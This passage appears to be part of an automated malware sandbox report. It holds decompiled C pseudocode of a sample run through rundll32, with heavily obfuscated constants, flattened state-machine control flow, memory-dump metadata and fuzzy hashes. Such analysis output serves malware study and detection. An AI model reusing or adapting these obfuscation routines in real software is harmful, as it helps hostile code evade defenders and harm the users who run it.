                                                                                                                          				_v1692 = _v1692 + 0xffff6b87;
                                                                                                                          				_v1692 = _v1692 + 0xffff176e;
                                                                                                                          				_v1692 = _v1692 ^ 0x0004c90f;
                                                                                                                          				_v1668 = 0x5abcaa;
                                                                                                                          				_v1668 = _v1668 | 0xa6adf3e3;
                                                                                                                          				_v1668 = _v1668 + 0xffff713c;
                                                                                                                          				_v1668 = _v1668 << 6;
                                                                                                                          				_v1668 = _v1668 ^ 0xbfd49dc8;
                                                                                                                          				_v1700 = 0xb35187;
                                                                                                                          				_v1700 = _v1700 | 0x50a44dff;
                                                                                                                          				_v1700 = _v1700 + 0xfffff2e6;
                                                                                                                          				_v1700 = _v1700 >> 8;
                                                                                                                          				_v1700 = _v1700 ^ 0x0051b9c1;
                                                                                                                          				_v1644 = 0x4d7cc3;
                                                                                                                          				_v1644 = _v1644 + 0xffffa786;
                                                                                                                          				_v1644 = _v1644 | 0x8b8a715e;
                                                                                                                          				_v1644 = _v1644 ^ 0x6234f021;
                                                                                                                          				_v1644 = _v1644 ^ 0xe9f998a6;
                                                                                                                          				_v1624 = 0x204c5b;
                                                                                                                          				_v1624 = _v1624 + 0xffffa901;
                                                                                                                          				_v1624 = _v1624 + 0x49e1;
                                                                                                                          				_v1624 = _v1624 ^ 0x002fe6aa;
                                                                                                                          				_v1632 = 0xbb0a9b;
                                                                                                                          				_v1632 = _v1632 * 0x52;
                                                                                                                          				_v1632 = _v1632 | 0x83893080;
                                                                                                                          				_v1632 = _v1632 ^ 0xbbe905c0;
                                                                                                                          				_v1620 = 0x19fb1a;
                                                                                                                          				_v1620 = _v1620 | 0x985eae3d;
                                                                                                                          				_v1620 = _v1620 + 0xf613;
                                                                                                                          				_v1620 = _v1620 ^ 0x9864c971;
                                                                                                                          				_v1656 = 0x35ecb4;
                                                                                                                          				_v1656 = _v1656 * 0x29;
                                                                                                                          				_v1656 = _v1656 + 0x1081;
                                                                                                                          				_v1656 = _v1656 + 0xffffd324;
                                                                                                                          				_v1656 = _v1656 ^ 0x08a8fe56;
                                                                                                                          				_v1580 = 0xc60f6f;
                                                                                                                          				_v1580 = _v1580 + 0xffffd3e6;
                                                                                                                          				_v1580 = _v1580 ^ 0x00c233ea;
                                                                                                                          				_v1664 = 0x2df5c;
                                                                                                                          				_v1664 = _v1664 << 8;
                                                                                                                          				_v1664 = _v1664 * 0x4c;
                                                                                                                          				_v1664 = _v1664 + 0xffffaed7;
                                                                                                                          				_v1664 = _v1664 ^ 0xda40187b;
                                                                                                                          				_v1672 = 0x38409b;
                                                                                                                          				_v1672 = _v1672 * 0x33;
                                                                                                                          				_v1672 = _v1672 | 0x7fcdffbb;
                                                                                                                          				_v1672 = _v1672 ^ 0x7ff87770;
                                                                                                                          				_v1680 = 0xe751cb;
                                                                                                                          				_v1680 = _v1680 ^ 0x8590ed7d;
                                                                                                                          				_v1680 = _v1680 + 0xffffebc9;
                                                                                                                          				_v1680 = _v1680 * 0x5e;
                                                                                                                          				_v1680 = _v1680 ^ 0x01e2719c;
                                                                                                                          				_v1688 = 0x15e1cd;
                                                                                                                          				_v1688 = _v1688 + 0xfe19;
                                                                                                                          				_v1688 = _v1688 + 0xffffc88c;
                                                                                                                          				_v1688 = _v1688 << 7;
                                                                                                                          				_v1688 = _v1688 ^ 0x0b5f3deb;
                                                                                                                          				_v1696 = 0x33a377;
                                                                                                                          				_v1696 = _v1696 << 0xa;
                                                                                                                          				_v1696 = _v1696 ^ 0xfb2d04b5;
                                                                                                                          				_v1696 = _v1696 | 0xd2f07883;
                                                                                                                          				_v1696 = _v1696 ^ 0xf7fa7ce3;
                                                                                                                          				_v1640 = 0x94004d;
                                                                                                                          				_v1640 = _v1640 >> 0xa;
                                                                                                                          				_t438 = 0x67;
                                                                                                                          				_v1640 = _v1640 * 0x3d;
                                                                                                                          				_v1640 = _v1640 >> 7;
                                                                                                                          				_v1640 = _v1640 ^ 0x00039ca1;
                                                                                                                          				_v1648 = 0xfcfef3;
                                                                                                                          				_v1648 = _v1648 * 0x18;
                                                                                                                          				_v1648 = _v1648 + 0x9c71;
                                                                                                                          				_v1648 = _v1648 | 0xf5d6202a;
                                                                                                                          				_v1648 = _v1648 ^ 0xf7f57601;
                                                                                                                          				_v1596 = 0xc58f80;
                                                                                                                          				_v1596 = _v1596 + 0xffff2f17;
                                                                                                                          				_v1596 = _v1596 ^ 0x00ce700d;
                                                                                                                          				_v1684 = 0xee980b;
                                                                                                                          				_v1684 = _v1684 >> 6;
                                                                                                                          				_v1684 = _v1684 / _t438;
                                                                                                                          				_v1684 = _v1684 + 0xffff2a3f;
                                                                                                                          				_v1684 = _v1684 ^ 0xfff3655c;
                                                                                                                          				_v1652 = 0x45a4a9;
                                                                                                                          				_v1652 = _v1652 >> 0xe;
                                                                                                                          				_t439 = 0x6e;
                                                                                                                          				_v1652 = _v1652 * 0x51;
                                                                                                                          				_v1652 = _v1652 + 0x9be3;
                                                                                                                          				_v1652 = _v1652 ^ 0x0004d4d8;
                                                                                                                          				_v1708 = 0x222243;
                                                                                                                          				_t176 =  &_v1708; // 0x222243
                                                                                                                          				_v1708 =  *_t176 / _t439;
                                                                                                                          				_v1708 = _v1708 << 9;
                                                                                                                          				_v1708 = _v1708 + 0xffff4a12;
                                                                                                                          				_v1708 = _v1708 ^ 0x009b5339;
                                                                                                                          				_v1612 = 0x464ea3;
                                                                                                                          				_v1612 = _v1612 + 0x89cc;
                                                                                                                          				_v1612 = _v1612 >> 2;
                                                                                                                          				_v1612 = _v1612 ^ 0x00167067;
                                                                                                                          				_v1588 = 0xd74d9e;
                                                                                                                          				_v1588 = _v1588 | 0x529da741;
                                                                                                                          				_v1588 = _v1588 ^ 0x52d09c78;
                                                                                                                          				_v1628 = 0x60b5eb;
                                                                                                                          				_v1628 = _v1628 >> 9;
                                                                                                                          				_t440 = 0x19;
                                                                                                                          				_v1628 = _v1628 / _t440;
                                                                                                                          				_v1628 = _v1628 ^ 0x000ff1bc;
                                                                                                                          				_v1676 = 0xfb7b01;
                                                                                                                          				_v1676 = _v1676 << 4;
                                                                                                                          				_v1676 = _v1676 + 0xffffc28e;
                                                                                                                          				_t441 = 0x1b;
                                                                                                                          				_v1676 = _v1676 / _t441;
                                                                                                                          				_v1676 = _v1676 ^ 0x0096cb21;
                                                                                                                          				_v1660 = 0xed67c1;
                                                                                                                          				_v1660 = _v1660 << 0xa;
                                                                                                                          				_v1660 = _v1660 | 0xef7d69c8;
                                                                                                                          				_v1660 = _v1660 << 2;
                                                                                                                          				_v1660 = _v1660 ^ 0xfff42fe1;
                                                                                                                          				_v1604 = 0x46c7e8;
                                                                                                                          				_v1604 = _v1604 << 0xf;
                                                                                                                          				_v1604 = _v1604 ^ 0x63fe3710;
                                                                                                                          				_v1636 = 0x7a345b;
                                                                                                                          				_v1636 = _v1636 + 0xd479;
                                                                                                                          				_v1636 = _v1636 + 0x8c7f;
                                                                                                                          				_v1636 = _v1636 ^ 0x00708a00;
                                                                                                                          				_v1704 = 0x80508e;
                                                                                                                          				_v1704 = _v1704 ^ 0xf958081f;
                                                                                                                          				_t442 = 0x4b;
                                                                                                                          				_v1704 = _v1704 / _t442;
                                                                                                                          				_t443 = 0x34;
                                                                                                                          				_v1704 = _v1704 * 0x44;
                                                                                                                          				_v1704 = _v1704 ^ 0xe2885afb;
                                                                                                                          				_v1576 = 0x325f4f;
                                                                                                                          				_t259 =  &_v1576; // 0x325f4f
                                                                                                                          				_v1576 =  *_t259 * 0x7a;
                                                                                                                          				_v1576 = _v1576 ^ 0x180920ed;
                                                                                                                          				_v1592 = 0xd554f9;
                                                                                                                          				_v1592 = _v1592 * 0x4e;
                                                                                                                          				_v1592 = _v1592 ^ 0x40f8e8dd;
                                                                                                                          				_v1608 = 0x6be570;
                                                                                                                          				_v1608 = _v1608 + 0x3d4f;
                                                                                                                          				_v1608 = _v1608 ^ 0x4461575c;
                                                                                                                          				_v1608 = _v1608 ^ 0x440eeedf;
                                                                                                                          				_v1616 = 0x4acfbf;
                                                                                                                          				_v1616 = _v1616 / _t443;
                                                                                                                          				_t444 = 0xe;
                                                                                                                          				_v1616 = _v1616 / _t444;
                                                                                                                          				_v1616 = _v1616 ^ 0x000fdd65;
                                                                                                                          				_v1600 = 0x55de88;
                                                                                                                          				_v1600 = _v1600 << 2;
                                                                                                                          				_v1600 = _v1600 ^ 0x01580110;
                                                                                                                          				do {
                                                                                                                          					while(_t396 != 0x196a97b) {
                                                                                                                          						if(_t396 == 0x2ca432c) {
                                                                                                                          							_push(_v1652);
                                                                                                                          							_push(_v1684);
                                                                                                                          							_t379 = E007ADCF7(_v1596, 0x7910f0, __eflags);
                                                                                                                          							E007A176B( &_v1560, __eflags);
                                                                                                                          							_t382 =  *0x7b3e10; // 0x0
                                                                                                                          							_t385 =  *0x7b3e10; // 0x0
                                                                                                                          							E007AE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
                                                                                                                          							E0079A8B0(_v1704, _t379, _v1576);
                                                                                                                          							_t449 =  &(_t449[0xf]);
                                                                                                                          							_t396 = 0x9d0e956;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t396 == 0x9368da1) {
                                                                                                                          								_push(_v1644);
                                                                                                                          								_push(_v1584);
                                                                                                                          								_push(_v1700);
                                                                                                                          								_push( &_v1040);
                                                                                                                          								E007A46BB(_v1692, _v1668);
                                                                                                                          								_t449 = _t449 - 0xc + 0x1c;
                                                                                                                          								_t396 = 0x196a97b;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								_t456 = _t396 - 0x9d0e956;
                                                                                                                          								if(_t396 != 0x9d0e956) {
                                                                                                                          									goto L10;
                                                                                                                          								} else {
                                                                                                                          									_push(_v1600);
                                                                                                                          									_push(_t436);
                                                                                                                          									_push(_t396);
                                                                                                                          									_push(_t436);
                                                                                                                          									_push(_t436);
                                                                                                                          									_push(_v1616);
                                                                                                                          									_push( &_v520);
                                                                                                                          									E0079AB87(_v1592, _v1608, _t456);
                                                                                                                          									_t436 =  !=  ? 1 : _t436;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L6:
                                                                                                                          						return _t436;
                                                                                                                          					}
                                                                                                                          					_push(_v1620);
                                                                                                                          					_push(_v1632);
                                                                                                                          					_t370 = E007ADCF7(_v1624, 0x791020, __eflags);
                                                                                                                          					E007A176B( &_v1560, __eflags);
                                                                                                                          					_t399 =  *0x7b3e10; // 0x0
                                                                                                                          					_t336 = _t399 + 0x1c; // 0x1c
                                                                                                                          					_t337 = _t399 + 0x23c; // 0x23c
                                                                                                                          					E007A1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
                                                                                                                          					E0079A8B0(_v1640, _t370, _v1648);
                                                                                                                          					_t449 =  &(_t449[0xf]);
                                                                                                                          					_t396 = 0x9d0e956;
                                                                                                                          					L10:
                                                                                                                          					__eflags = _t396 - 0xce3b296;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L6;
                                                                                                                          			}
                                                                                                                          0x007acfdc
                                                                                                                          0x007acfe7
                                                                                                                          0x007acfef
                                                                                                                          0x007acff6
                                                                                                                          0x007ad001
                                                                                                                          0x007ad014
                                                                                                                          0x007ad01b
                                                                                                                          0x007ad026
                                                                                                                          0x007ad02e
                                                                                                                          0x007ad036
                                                                                                                          0x007ad03e
                                                                                                                          0x007ad046
                                                                                                                          0x007ad056
                                                                                                                          0x007ad05e
                                                                                                                          0x007ad061
                                                                                                                          0x007ad065
                                                                                                                          0x007ad06d
                                                                                                                          0x007ad075
                                                                                                                          0x007ad07a
                                                                                                                          0x007ad082
                                                                                                                          0x007ad082
                                                                                                                          0x007ad090
                                                                                                                          0x007ad119
                                                                                                                          0x007ad122
                                                                                                                          0x007ad12d
                                                                                                                          0x007ad13b
                                                                                                                          0x007ad149
                                                                                                                          0x007ad16e
                                                                                                                          0x007ad19b
                                                                                                                          0x007ad1ad
                                                                                                                          0x007ad1b2
                                                                                                                          0x007ad1b5
                                                                                                                          0x00000000
                                                                                                                          0x007ad096
                                                                                                                          0x007ad09c
                                                                                                                          0x007ad0e8
                                                                                                                          0x007ad0f3
                                                                                                                          0x007ad0fa
                                                                                                                          0x007ad109
                                                                                                                          0x007ad10a
                                                                                                                          0x007ad10f
                                                                                                                          0x007ad112
                                                                                                                          0x00000000
                                                                                                                          0x007ad09e
                                                                                                                          0x007ad09e
                                                                                                                          0x007ad0a0
                                                                                                                          0x00000000
                                                                                                                          0x007ad0a6
                                                                                                                          0x007ad0a6
                                                                                                                          0x007ad0b1
                                                                                                                          0x007ad0b2
                                                                                                                          0x007ad0b3
                                                                                                                          0x007ad0b4
                                                                                                                          0x007ad0b5
                                                                                                                          0x007ad0ca
                                                                                                                          0x007ad0cb
                                                                                                                          0x007ad0d8
                                                                                                                          0x007ad0d8
                                                                                                                          0x007ad0a0
                                                                                                                          0x007ad09c
                                                                                                                          0x007ad0db
                                                                                                                          0x007ad0e7
                                                                                                                          0x007ad0e7
                                                                                                                          0x007ad1bc
                                                                                                                          0x007ad1c5
                                                                                                                          0x007ad1cd
                                                                                                                          0x007ad1db
                                                                                                                          0x007ad212
                                                                                                                          0x007ad21f
                                                                                                                          0x007ad223
                                                                                                                          0x007ad22e
                                                                                                                          0x007ad243
                                                                                                                          0x007ad248
                                                                                                                          0x007ad24b
                                                                                                                          0x007ad24d
                                                                                                                          0x007ad24d
                                                                                                                          0x007ad24d
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID: ;@B$C""$M$O_2$[L $\WaD$I
                                                                                                                          • API String ID: 1514166925-27743949
                                                                                                                          • Opcode ID: 124217ace7c1964df63d3e8e2c1faf17c24f6f3ef739bf719e6462c28bea3ff2
                                                                                                                          • Instruction ID: bdc0bddb3f8c2f8158807019dffd83c3bb8ba633106fe5aa80c594ac41f6da57
                                                                                                                          • Opcode Fuzzy Hash: 124217ace7c1964df63d3e8e2c1faf17c24f6f3ef739bf719e6462c28bea3ff2
                                                                                                                          • Instruction Fuzzy Hash: C8021EB15093819FD364CF25C98AA8BFBE1FBC4718F10891DF1DA86260D7B5894ACF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				void* _t170;
                                                                                                                          				void* _t181;
                                                                                                                          				void* _t184;
                                                                                                                          				void* _t189;
                                                                                                                          				void* _t192;
                                                                                                                          				void* _t195;
                                                                                                                          				void* _t197;
                                                                                                                          				void* _t220;
                                                                                                                          				signed int _t221;
                                                                                                                          				signed int _t222;
                                                                                                                          				signed int _t223;
                                                                                                                          				signed int* _t226;
                                                                                                                          
                                                                                                                          				_push(_a8);
                                                                                                                          				_t219 = _a4;
                                                                                                                          				_t195 = __ecx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t170);
                                                                                                                          				_v56 = 0xa4c651;
                                                                                                                          				_t226 =  &(( &_v116)[4]);
                                                                                                                          				_v56 = _v56 ^ 0x6a6d8bac;
                                                                                                                          				_v56 = _v56 ^ 0x6ac6bd64;
                                                                                                                          				_t220 = 0;
                                                                                                                          				_v60 = 0xbac055;
                                                                                                                          				_t197 = 0xf39239f;
                                                                                                                          				_v60 = _v60 << 0xd;
                                                                                                                          				_v60 = _v60 ^ 0x580542e6;
                                                                                                                          				_v108 = 0xd580f5;
                                                                                                                          				_v108 = _v108 ^ 0x97cdda0d;
                                                                                                                          				_v108 = _v108 + 0x37dd;
                                                                                                                          				_v108 = _v108 >> 0xe;
                                                                                                                          				_v108 = _v108 ^ 0x00021113;
                                                                                                                          				_v52 = 0xf28435;
                                                                                                                          				_v52 = _v52 | 0x057a1a90;
                                                                                                                          				_v52 = _v52 ^ 0x05fdc129;
                                                                                                                          				_v80 = 0x5c8bc8;
                                                                                                                          				_t221 = 0x27;
                                                                                                                          				_v80 = _v80 / _t221;
                                                                                                                          				_t222 = 0x1b;
                                                                                                                          				_v80 = _v80 * 9;
                                                                                                                          				_v80 = _v80 ^ 0x0013f028;
                                                                                                                          				_v96 = 0x281d9a;
                                                                                                                          				_v96 = _v96 + 0xffff8f77;
                                                                                                                          				_v96 = _v96 + 0x4719;
                                                                                                                          				_v96 = _v96 << 0xf;
                                                                                                                          				_v96 = _v96 ^ 0xfa152b1c;
                                                                                                                          				_v112 = 0x7415d8;
                                                                                                                          				_v112 = _v112 >> 0xf;
                                                                                                                          				_v112 = _v112 + 0xfffff76c;
                                                                                                                          				_v112 = _v112 >> 0xd;
                                                                                                                          				_v112 = _v112 ^ 0x000d779a;
                                                                                                                          				_v88 = 0xb68707;
                                                                                                                          				_v88 = _v88 ^ 0x45e0ecf4;
                                                                                                                          				_v88 = _v88 + 0xffff71c0;
                                                                                                                          				_v88 = _v88 ^ 0x455519c2;
                                                                                                                          				_v116 = 0xceabf6;
                                                                                                                          				_v116 = _v116 + 0x1225;
                                                                                                                          				_v116 = _v116 / _t222;
                                                                                                                          				_v116 = _v116 >> 6;
                                                                                                                          				_v116 = _v116 ^ 0x0006e3bb;
                                                                                                                          				_v84 = 0xd525a4;
                                                                                                                          				_v84 = _v84 + 0xffff1243;
                                                                                                                          				_v84 = _v84 + 0x1c30;
                                                                                                                          				_v84 = _v84 ^ 0x00df7efc;
                                                                                                                          				_v100 = 0xf29ecf;
                                                                                                                          				_v100 = _v100 << 0xc;
                                                                                                                          				_v100 = _v100 + 0xffff4e95;
                                                                                                                          				_v100 = _v100 ^ 0x70d6065d;
                                                                                                                          				_v100 = _v100 ^ 0x593d89f0;
                                                                                                                          				_v104 = 0x2206c6;
                                                                                                                          				_v104 = _v104 | 0x38687435;
                                                                                                                          				_v104 = _v104 ^ 0xadcf411b;
                                                                                                                          				_v104 = _v104 ^ 0x9549ac77;
                                                                                                                          				_v104 = _v104 ^ 0x00e3f730;
                                                                                                                          				_v92 = 0xd38a43;
                                                                                                                          				_v92 = _v92 >> 3;
                                                                                                                          				_v92 = _v92 + 0x6fd1;
                                                                                                                          				_v92 = _v92 ^ 0x0012c73c;
                                                                                                                          				_v64 = 0x625266;
                                                                                                                          				_v64 = _v64 + 0x2436;
                                                                                                                          				_v64 = _v64 ^ 0x006987c3;
                                                                                                                          				_v68 = 0xe296bd;
                                                                                                                          				_v68 = _v68 << 0xd;
                                                                                                                          				_v68 = _v68 ^ 0x52d9a139;
                                                                                                                          				_v72 = 0x54a2fd;
                                                                                                                          				_v72 = _v72 << 0xd;
                                                                                                                          				_v72 = _v72 >> 0xa;
                                                                                                                          				_v72 = _v72 ^ 0x002b3e4c;
                                                                                                                          				_v76 = 0x32cdcd;
                                                                                                                          				_v76 = _v76 << 0xb;
                                                                                                                          				_t223 = 0x32;
                                                                                                                          				_v76 = _v76 / _t223;
                                                                                                                          				_v76 = _v76 ^ 0x0302c408;
                                                                                                                          				_v48 = 0x2d2164;
                                                                                                                          				_v48 = _v48 + 0xfffff0e0;
                                                                                                                          				_v48 = _v48 ^ 0x0021ab5a;
                                                                                                                          				do {
                                                                                                                          					while(_t197 != 0x2168849) {
                                                                                                                          						if(_t197 == 0x29fa3de) {
                                                                                                                          							_t184 = E00792A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
                                                                                                                          							_t226 =  &(_t226[3]);
                                                                                                                          							__eflags = _t184;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t197 = 0x74ac459;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							if(_t197 == 0x545de14) {
                                                                                                                          								E00793DBC( &_v44, _t195, _v56, _v60, _v108);
                                                                                                                          								_t226 =  &(_t226[3]);
                                                                                                                          								_t197 = 0x2168849;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t197 == 0x6ab10c5) {
                                                                                                                          									_t189 = E00792A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
                                                                                                                          									_t226 =  &(_t226[3]);
                                                                                                                          									__eflags = _t189;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_t197 = 0x29fa3de;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									if(_t197 == 0x74ac459) {
                                                                                                                          										_t192 = E00792A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
                                                                                                                          										_t226 =  &(_t226[3]);
                                                                                                                          										__eflags = _t192;
                                                                                                                          										if(__eflags != 0) {
                                                                                                                          											_t197 = 0x9dbfb8a;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										if(_t197 == 0x9dbfb8a) {
                                                                                                                          											__eflags = E007AD97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
                                                                                                                          											_t220 =  !=  ? 1 : _t220;
                                                                                                                          										} else {
                                                                                                                          											if(_t197 != 0xf39239f) {
                                                                                                                          												goto L19;
                                                                                                                          											} else {
                                                                                                                          												_t197 = 0x545de14;
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L22:
                                                                                                                          						return _t220;
                                                                                                                          					}
                                                                                                                          					_t181 = E00792A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
                                                                                                                          					_t226 =  &(_t226[3]);
                                                                                                                          					__eflags = _t181;
                                                                                                                          					if(__eflags == 0) {
                                                                                                                          						_t197 = 0x90a774d;
                                                                                                                          						goto L19;
                                                                                                                          					} else {
                                                                                                                          						_t197 = 0x6ab10c5;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L22;
                                                                                                                          					L19:
                                                                                                                          					__eflags = _t197 - 0x90a774d;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L22;
                                                                                                                          			}



































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                          • API String ID: 0-2045295228
                                                                                                                          • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                          • Instruction ID: 2ca2a06f58d880fa27358b740c9c8abe9469b146f552e3982ba3727c8d6ee7b0
                                                                                                                          • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                          • Instruction Fuzzy Hash: F29164B2508341ABCB94CE61D88982BFBE5FBD4758F005A1DF58292221D7B5DA19CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E0079E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				char _v556;
                                                                                                                          				intOrPtr _v576;
                                                                                                                          				char _v600;
                                                                                                                          				signed int _v604;
                                                                                                                          				signed int _v608;
                                                                                                                          				signed int _v612;
                                                                                                                          				signed int _v616;
                                                                                                                          				signed int _v620;
                                                                                                                          				signed int _v624;
                                                                                                                          				signed int _v628;
                                                                                                                          				signed int _v632;
                                                                                                                          				signed int _v636;
                                                                                                                          				signed int _v640;
                                                                                                                          				signed int _v644;
                                                                                                                          				signed int _v648;
                                                                                                                          				signed int _v652;
                                                                                                                          				void* __ecx;
                                                                                                                          				void* _t136;
                                                                                                                          				void* _t151;
                                                                                                                          				signed int _t153;
                                                                                                                          				signed int _t156;
                                                                                                                          				void* _t162;
                                                                                                                          				signed int _t167;
                                                                                                                          				intOrPtr _t187;
                                                                                                                          				signed int _t188;
                                                                                                                          				signed int _t189;
                                                                                                                          				signed int _t190;
                                                                                                                          				signed int _t191;
                                                                                                                          				signed int _t192;
                                                                                                                          				signed int* _t196;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_t187 = _a8;
                                                                                                                          				_push(_t187);
                                                                                                                          				_push(E00798E4D);
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t136);
                                                                                                                          				_v608 = 0x1ac257;
                                                                                                                          				_t196 =  &(( &_v652)[5]);
                                                                                                                          				_v608 = _v608 ^ 0x78a3296c;
                                                                                                                          				_v608 = _v608 ^ 0x78b9eb39;
                                                                                                                          				_t162 = 0xac58df2;
                                                                                                                          				_v624 = 0x387e66;
                                                                                                                          				_t9 =  &_v624; // 0x387e66
                                                                                                                          				_t188 = 0x2e;
                                                                                                                          				_v624 =  *_t9 * 0x13;
                                                                                                                          				_v624 = _v624 / _t188;
                                                                                                                          				_v624 = _v624 ^ 0x001972d5;
                                                                                                                          				_v644 = 0x433552;
                                                                                                                          				_v644 = _v644 + 0xffffa6b6;
                                                                                                                          				_v644 = _v644 ^ 0x94defa20;
                                                                                                                          				_v644 = _v644 << 1;
                                                                                                                          				_v644 = _v644 ^ 0x293db944;
                                                                                                                          				_v652 = 0xb70b59;
                                                                                                                          				_v652 = _v652 << 0xb;
                                                                                                                          				_v652 = _v652 + 0xffff8138;
                                                                                                                          				_t189 = 0x15;
                                                                                                                          				_v652 = _v652 / _t189;
                                                                                                                          				_v652 = _v652 ^ 0x08c5a62f;
                                                                                                                          				_v616 = 0xf4782f;
                                                                                                                          				_v616 = _v616 >> 0xa;
                                                                                                                          				_v616 = _v616 + 0xffff066a;
                                                                                                                          				_v616 = _v616 ^ 0xfff8c7bc;
                                                                                                                          				_v604 = 0x656560;
                                                                                                                          				_v604 = _v604 >> 3;
                                                                                                                          				_v604 = _v604 ^ 0x0000606f;
                                                                                                                          				_v648 = 0x377d9b;
                                                                                                                          				_t190 = 0x7f;
                                                                                                                          				_v648 = _v648 / _t190;
                                                                                                                          				_v648 = _v648 + 0xfd7f;
                                                                                                                          				_v648 = _v648 + 0xffff6b0a;
                                                                                                                          				_v648 = _v648 ^ 0x00006649;
                                                                                                                          				_v636 = 0x80cedd;
                                                                                                                          				_t191 = 0x58;
                                                                                                                          				_v636 = _v636 / _t191;
                                                                                                                          				_v636 = _v636 + 0x515e;
                                                                                                                          				_v636 = _v636 ^ 0x000b92de;
                                                                                                                          				_v620 = 0x65d9bd;
                                                                                                                          				_v620 = _v620 + 0xffff4b50;
                                                                                                                          				_v620 = _v620 ^ 0xd34cfccc;
                                                                                                                          				_v620 = _v620 ^ 0xd32e4bd2;
                                                                                                                          				_v632 = 0xb89e86;
                                                                                                                          				_v632 = _v632 + 0xffffcc79;
                                                                                                                          				_t192 = 0x2f;
                                                                                                                          				_v632 = _v632 / _t192;
                                                                                                                          				_v632 = _v632 ^ 0x00046a67;
                                                                                                                          				_v628 = 0xbb1c4a;
                                                                                                                          				_v628 = _v628 >> 6;
                                                                                                                          				_v628 = _v628 >> 9;
                                                                                                                          				_v628 = _v628 ^ 0x000a4ee8;
                                                                                                                          				_v640 = 0xfd7114;
                                                                                                                          				_v640 = _v640 << 5;
                                                                                                                          				_v640 = _v640 * 0x45;
                                                                                                                          				_v640 = _v640 + 0xa2ea;
                                                                                                                          				_v640 = _v640 ^ 0x89e0c310;
                                                                                                                          				_v612 = 0x26e293;
                                                                                                                          				_v612 = _v612 >> 0xd;
                                                                                                                          				_v612 = _v612 ^ 0x00050986;
                                                                                                                          				_t193 = _v612;
                                                                                                                          				do {
                                                                                                                          					while(_t162 != 0x249e110) {
                                                                                                                          						if(_t162 == 0x48c9d54) {
                                                                                                                          							_v556 = 0x22c;
                                                                                                                          							_t153 = E007AC15D(_t193, _v652, _v616,  &_v556, _v604);
                                                                                                                          							_t196 =  &(_t196[3]);
                                                                                                                          							asm("sbb ecx, ecx");
